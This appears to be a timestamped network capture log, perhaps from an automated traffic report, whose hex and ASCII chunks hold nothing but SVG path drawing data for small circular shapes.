                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8281INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8297INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                                                                                                                          Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8313INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8329INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8345INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8361INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                                                                                                                          Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8377INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8393INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8409INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8425INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8441INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8457INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8473INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8489INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8505INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                                                                                                                          Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8521INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8537INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
